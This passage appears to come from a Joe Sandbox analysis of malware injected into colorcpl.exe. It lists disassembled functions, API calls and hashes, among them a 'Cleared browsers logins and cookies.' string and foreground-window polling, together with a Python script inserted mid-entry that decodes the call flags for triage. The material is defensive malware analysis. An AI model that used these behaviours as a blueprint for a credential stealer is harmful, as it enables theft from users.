                                                                                                                              • Instruction Fuzzy Hash: BCA15A31A00B45AFE721CF98C8907AEBBE5EF61318F18416FD4859B341F239AD61CB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1036877536-0
                                                                                                                              • Opcode ID: 1f5093d525d66a8c77a7a6d48f25c6de002bd88e4623d7d1b5926d2fba8dadfa
                                                                                                                              • Instruction ID: 5f66bb6ecfd8c8c52eff04c967094aab6db2a99325cdfb0bde45df2099e8f6ca
                                                                                                                              • Opcode Fuzzy Hash: 1f5093d525d66a8c77a7a6d48f25c6de002bd88e4623d7d1b5926d2fba8dadfa
                                                                                                                              • Instruction Fuzzy Hash: 67A159B2E103A79FEB61CF18C8917BEBBE5EF55310F1845ADE5959B281C238C942CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: 4bb121503855b0c648f22cd5e3547122c2e67cde050c34423435fbf69ae766f5
                                                                                                                              • Instruction ID: aceaf046bc25b285d4f75f4181640108ed660dcf76f8ff89e261b8b864b97bc3
                                                                                                                              • Opcode Fuzzy Hash: 4bb121503855b0c648f22cd5e3547122c2e67cde050c34423435fbf69ae766f5
                                                                                                                              • Instruction Fuzzy Hash: 7241F9716005046AEB256FB8CC446EE3BA4DF46328F14011AF564D6290FA74BC914BE7
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7a80c7861b9317ec132871a926f805246d98ca7ae37c4e65b35e863586c6e1c4
                                                                                                                              • Instruction ID: 612262a5cd67049d9ead26836882071bcf9d76c652e5116bd266d87b7907de69
                                                                                                                              • Opcode Fuzzy Hash: 7a80c7861b9317ec132871a926f805246d98ca7ae37c4e65b35e863586c6e1c4
                                                                                                                              • Instruction Fuzzy Hash: 21412772A40A04AFE7249F78CC40BAA7BE8EB84710F10856EF051DB390F671FD658B95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • [Cleared browsers logins and cookies.], xrefs: 0466C0E4
                                                                                                                              • Cleared browsers logins and cookies., xrefs: 0466C0F5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                              • API String ID: 3472027048-1236744412
                                                                                                                              • Opcode ID: 92203a29d45702018b28927603754b076efaeb410541263febd0a231ad35d16a
                                                                                                                              • Instruction ID: 796d3812fb5cda5a2497b7ac578f1626eb5560b331457099b8685928a1a02dd3
                                                                                                                              • Opcode Fuzzy Hash: 92203a29d45702018b28927603754b076efaeb410541263febd0a231ad35d16a
                                                                                                                              • Instruction Fuzzy Hash: 2531B2047487C1AEEB126BB454257FA7F824FA3648F48549CA8C70B342F95374489767
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0467C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0467C561
                                                                                                                                • Part of subcall function 0467C551: GetWindowTextLengthW.USER32(00000000), ref: 0467C56A
                                                                                                                                • Part of subcall function 0467C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0467C594
                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0466A573
                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0466A5FD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                                                                              • String ID: [ $ ]
                                                                                                                              • API String ID: 3309952895-93608704
                                                                                                                              • Opcode ID: e0c21bae430af7d40efc6a5719351ebcf1a6d32507f490fc7c9bef8ad8551dcf
                                                                                                                              • Instruction ID: d6f05020397d8617fdc5f2253885d1b0200c0c1423a9a10194cebf8bbf6e40de
                                                                                                                              • Opcode Fuzzy Hash: e0c21bae430af7d40efc6a5719351ebcf1a6d32507f490fc7c9bef8ad8551dcf
                                                                                                                              • Instruction Fuzzy Hash: 8F11A2316142005BE614FB74DC519AFB7A9AF52308F40052DE553621E1FF71FE1887DA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 74b74212c2fd84d6d734e00da0661cb855aa4f928a97c7596fbdaa82720cb03e
                                                                                                                              • Instruction ID: 3173b183e2e34568bb6f5587651bba3348b32cd04ef95e68530a36873e5e2613
                                                                                                                              • Opcode Fuzzy Hash: 74b74212c2fd84d6d734e00da0661cb855aa4f928a97c7596fbdaa82720cb03e
                                                                                                                              • Instruction Fuzzy Hash: AC01D6B2709A217EF71159B96CC4D67624DDF613B9328032AFA31513D0FB74ECA549B0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,046A850D,00000000,00000000,00000000,00000000,?,046A8839,00000006,FlsSetValue), ref: 046A8598
                                                                                                                              • GetLastError.KERNEL32(?,046A850D,00000000,00000000,00000000,00000000,?,046A8839,00000006,FlsSetValue,046BF160,046BF168,00000000,00000364,?,046A82E7), ref: 046A85A4
                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,046A850D,00000000,00000000,00000000,00000000,?,046A8839,00000006,FlsSetValue,046BF160,046BF168,00000000), ref: 046A85B2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3177248105-0
                                                                                                                              • Opcode ID: 01e84f1d79c4df9ae31a9a687d0f4de98cb96f8e69deedafdc7b4ee809c5cd2b
                                                                                                                              • Instruction ID: c66099c5465f95f369d4f578515b462c85c912b428809ce8f5c8478dda5661c4
                                                                                                                              • Opcode Fuzzy Hash: 01e84f1d79c4df9ae31a9a687d0f4de98cb96f8e69deedafdc7b4ee809c5cd2b
                                                                                                                              • Instruction Fuzzy Hash: D8017B72716A229BC761AE399C44A577B98EF117A1B100220FE06D3340FB34FC11CEE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0466A843), ref: 0467C49E
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0467C4B2
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0467C4D7
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0467C4E5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3919263394-0
                                                                                                                              • Opcode ID: 5e509ba552025429b6ff043a3c40c27577e5d33a575906af3defaa2c22a4c704
                                                                                                                              • Instruction ID: 5e9ede811acacfef424229386365c47e69105c3a7ed9a207e49c7b27a1f2fbe3
                                                                                                                              • Opcode Fuzzy Hash: 5e509ba552025429b6ff043a3c40c27577e5d33a575906af3defaa2c22a4c704
                                                                                                                              • Instruction Fuzzy Hash: F3F096B12413187FF7105E25AC94FBF379CEB877A4F00152DFA02E22C0EA255D099171
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0467C1F5
                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0467C208
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0467C233
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0467C23B
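The four "APIs" lists above (the GetForegroundWindow/GetWindowTextW/Sleep entry, the LoadLibraryExW/GetLastError entry, the CreateFileW/GetFileSize/ReadFile entry and the OpenProcess entry) print every argument as raw hex, so the access rights and flags that matter for triage have to be decoded by hand. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses call lines in the report's own "• Api.MODULE(args), ref: ADDR" format, decodes the flag-bearing arguments with the documented Win32 constants (for example 0x1000 = PROCESS_QUERY_LIMITED_INFORMATION, 0x800 = LOAD_LIBRARY_SEARCH_SYSTEM32, 0x1F4 = 500 ms), and summarises the behaviours those calls add up to. The sample lines are copied from the entries above with some argument lists shortened; the triage wording and the rules in `triage()` are this example's own, not Joe Sandbox signatures.

```python
"""Decode the API-call lines of Joe Sandbox function entries (added example)."""
import re
from typing import Dict, List, Optional

# A call line as printed in the report's "APIs" list, for example:
#   • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0467C1F5
CALL_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
HEX_RE = re.compile(r"[0-9A-Fa-f]+")

# Documented Win32 constants for the argument positions that carry flags in these calls.
PROCESS_ACCESS = {0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
                  0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                  0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x20000000: "GENERIC_EXECUTE"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
LOAD_FLAGS = {0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
              0x8: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
              0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS"}

# api -> (argument index, parameter name, lookup table or None for a plain number, bitmask?)
DECODERS = {
    "OpenProcess": [(0, "dwDesiredAccess", PROCESS_ACCESS, True)],
    "CreateFileW": [(1, "dwDesiredAccess", GENERIC_ACCESS, True), (2, "dwShareMode", SHARE_MODE, True),
                    (4, "dwCreationDisposition", DISPOSITION, False), (5, "dwFlagsAndAttributes", FILE_FLAGS, True)],
    "LoadLibraryExW": [(2, "dwFlags", LOAD_FLAGS, True)],
    "Sleep": [(0, "dwMilliseconds", None, False)],
}


def _bits(value: int, table: Dict[int, str]) -> str:
    """Expand a bitmask into '|'-joined constant names; bits not in the table stay as hex."""
    names = [name for bit, name in table.items() if (value & bit) == bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"


def parse_call(line: str) -> Optional[dict]:
    """Parse one '• Api.MODULE(args), ref: ADDR' line; return None for non-call lines."""
    m = CALL_RE.search(line)
    if not m:
        return None
    raw = [a.strip() for a in m.group("args").split(",")] if m.group("args").strip() else []
    decoded = {}
    for idx, name, table, bitmask in DECODERS.get(m.group("api"), []):
        if idx >= len(raw) or not HEX_RE.fullmatch(raw[idx]):
            decoded[name] = "?"          # the sandbox could not resolve this argument
            continue
        value = int(raw[idx], 16)
        if table is None:
            decoded[name] = f"{value} ms"
        elif bitmask:
            decoded[name] = _bits(value, table)
        else:
            decoded[name] = table.get(value, hex(value))
    return {"api": m.group("api"), "module": m.group("module"), "ref": m.group("ref").upper(),
            "subcall": "Part of subcall" in line, "args": raw, "decoded": decoded}


def decode_report(lines: List[str]) -> List[dict]:
    """Parse every call line in a block of report text, skipping headers and metadata lines."""
    return [c for c in (parse_call(l) for l in lines) if c is not None]


def triage(calls: List[dict]) -> List[str]:
    """Summarise decoded calls as the behaviours a triager would note (rules are this example's own)."""
    apis = {c["api"] for c in calls}
    findings = []
    if {"GetForegroundWindow", "GetWindowTextW", "Sleep"} <= apis:
        waits = [c["decoded"]["dwMilliseconds"] for c in calls if c["api"] == "Sleep"]
        findings.append("polls the foreground window title in a Sleep loop (" + ", ".join(waits) + ")")
    if {"CreateFileW", "GetFileSize", "ReadFile"} <= apis:
        for c in calls:
            if c["api"] == "CreateFileW" and c["decoded"]["dwDesiredAccess"] == "GENERIC_READ":
                findings.append("reads a whole file into memory via " + c["decoded"]["dwCreationDisposition"])
    load_flags = [c["decoded"]["dwFlags"] for c in calls if c["api"] == "LoadLibraryExW"]
    if "LOAD_LIBRARY_SEARCH_SYSTEM32" in load_flags and "0" in load_flags:
        findings.append("LoadLibraryExW restricted to System32, then retried with no flags")
    rights = sorted({c["decoded"]["dwDesiredAccess"] for c in calls if c["api"] == "OpenProcess"})
    if rights:
        kind = "injection-capable" if any("VM_WRITE" in r or "CREATE_THREAD" in r for r in rights) else "query-only"
        findings.append(f"opens processes with {kind} rights: " + ", ".join(rights))
    return findings


# Constructed sample: call lines copied from the function entries above (some argument lists shortened).
SAMPLE_LINES = [
    "• Part of subcall function 0467C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?), ref: 0467C561",
    "• Part of subcall function 0467C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0467C594",
    "• Sleep.KERNEL32(000001F4), ref: 0466A573",
    "• Sleep.KERNEL32(00000064), ref: 0466A5FD",
    "• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,?,046A850D), ref: 046A8598",
    "• GetLastError.KERNEL32(?,046A850D,00000000), ref: 046A85A4",
    "• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,046A850D), ref: 046A85B2",
    "• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0466A843), ref: 0467C49E",
    "• GetFileSize.KERNEL32(00000000,00000000), ref: 0467C4B2",
    "• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0467C4D7",
    "• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0467C1F5",
    "• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0467C208",
    "Memory Dump Source",  # a metadata line, ignored by the parser
]

if __name__ == "__main__":
    for call in decode_report(SAMPLE_LINES):
        print(f"{call['ref']} {call['api']:<20} {call['decoded']}")
    for finding in triage(decode_report(SAMPLE_LINES)):
        print("-", finding)
```

Run against the lines above, the decoder shows that the CreateFileW call opens an existing file read-only with shared read/write access, that the OpenProcess calls request only query rights (0x1000 first, then the older 0x400 value), and that the first LoadLibraryExW call is restricted to System32 and retried without the flag after GetLastError; a different function entry, one whose OpenProcess carried PROCESS_VM_WRITE or PROCESS_CREATE_THREAD, would be reported as injection-capable instead.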
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandleOpenProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 39102293-0
                                                                                                                              • Opcode ID: f7639332f4a5738c516136148658dd0e725095b3fbaf80409dbd4e5fac3710e7
                                                                                                                              • Instruction ID: c9a4887a210b931460bb76c97fc7cd3af752347f18084f00c3bd25755e76ac7b
                                                                                                                              • Opcode Fuzzy Hash: f7639332f4a5738c516136148658dd0e725095b3fbaf80409dbd4e5fac3710e7
                                                                                                                              • Instruction Fuzzy Hash: 2A0149F12403156BD71056D89C49F7BB37CDB44785F000055FB14C2290FF70AD8186B1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0469987A
                                                                                                                                • Part of subcall function 04699EB2: ___AdjustPointer.LIBCMT ref: 04699EFC
                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 04699891
                                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 046998A3
                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 046998C7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2633735394-0
                                                                                                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                              • Instruction ID: fb7d8d1c46f8fcda2254f07699f2bfc6afd7e75760fe687e2470a1720e8626ee
                                                                                                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                              • Instruction Fuzzy Hash: A701C572000109BBDF125F55CD00EAA3BBAEF98754F05451DF95865220E3B6E8A5DBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0671A586
                                                                                                                                • Part of subcall function 0671ABBE: ___AdjustPointer.LIBCMT ref: 0671AC08
                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0671A59D
                                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 0671A5AF
                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0671A5D3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2633735394-0
                                                                                                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                              • Instruction ID: 7c653d241c324edf868851baab3fed3d93345bc542d4651c23d9c54f25518d72
                                                                                                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                              • Instruction Fuzzy Hash: BD015E32401208FBCF925F59CC04EEA7BBAFF49710F044116FE586A120D332E5A1DBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 046793F0
                                                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 046793F6
                                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 046793FC
                                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 04679402
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MetricsSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4116985748-0
                                                                                                                              • Opcode ID: 249834b7a9558a980b9c7d50752fdebbbe31f8bce367d91971dc2a720068ce26
                                                                                                                              • Instruction ID: 1126e1a61fbf08206b54a68817c4307b8f1f8ad92833c8b62b3690ac4e9bccf0
                                                                                                                              • Opcode Fuzzy Hash: 249834b7a9558a980b9c7d50752fdebbbe31f8bce367d91971dc2a720068ce26
                                                                                                                              • Instruction Fuzzy Hash: ACF0AFF2B403155BF740EE758844A2F6BD5EBC5264F10483EE2088B280FEB4EC098B81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 04698F31
                                                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 04698F36
                                                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 04698F3B
                                                                                                                                • Part of subcall function 0469A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0469A44B
                                                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 04698F50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1761009282-0
                                                                                                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                              • Instruction ID: a3adca4410c620174a4f545f6a4aeb27cc16087bac2a3df8f61cd2745b29df1a
                                                                                                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                              • Instruction Fuzzy Hash: B4C002140203C1563D507EF022182BD03CE1AA36CCBC064DD889197502BAC63C0A602E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 06719C3D
                                                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 06719C42
                                                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 06719C47
                                                                                                                                • Part of subcall function 0671B146: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0671B157
                                                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 06719C5C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1761009282-0
                                                                                                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                              • Instruction ID: 376f8a6ac4fe7e44f370d889ece667965b25150275feb34cd11f4921c8f97277
                                                                                                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                              • Instruction Fuzzy Hash: C3C04C14520601A43FD43E7C1BA91FE03951C628C9B8155C78BB41F102DD05510B60B3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 046A2CED
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                              • String ID: pow
                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                              • Opcode ID: f9bb6ab39d8151c4494b4365a3d59517d07076bde082e05202da53c5fd092972
                                                                                                                              • Instruction ID: 46fa23450d43c9556c7f01b4983363b1683d70209499f71038b47a5a051673c9
                                                                                                                              • Opcode Fuzzy Hash: f9bb6ab39d8151c4494b4365a3d59517d07076bde082e05202da53c5fd092972
                                                                                                                              • Instruction Fuzzy Hash: 60518E61A45E0286D716BB14C92036A3BA5EF10750F204DDDE087817EAFB35ACF59E87
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • __EH_prolog.LIBCMT ref: 066E951D
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 066E95FE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8H_prologThrow
                                                                                                                              • String ID: hdF
                                                                                                                              • API String ID: 3222999186-665520524
                                                                                                                              • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                                                                                                              • Instruction ID: 5910e3854272579b8ddb1b069b8a365ee14f0037f9d1ca1a4f9670b17471eeaa
                                                                                                                              • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                                                                                                              • Instruction Fuzzy Hash: 2C517432902108AACFD4FF60DD969ED7B7DAF14340F50025DE826A7190EF349B89CB95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
